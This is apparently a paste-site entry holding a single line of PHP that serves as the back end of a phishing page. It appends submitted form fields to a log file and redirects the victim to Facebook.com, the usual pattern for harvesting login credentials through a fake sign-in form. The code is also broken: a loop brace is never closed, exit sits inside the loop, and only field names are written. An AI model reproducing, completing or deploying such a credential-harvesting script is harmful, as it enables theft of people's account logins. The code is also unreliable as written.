Untitled
2 years ago by Jhaywest in Plain Text
<?php header ('Location:Facebook.com');$handle = fopen("log.txt", "a"); foreach($_POST as $variable =>$value) {fwrite($handle, $variable); exit; ?>
1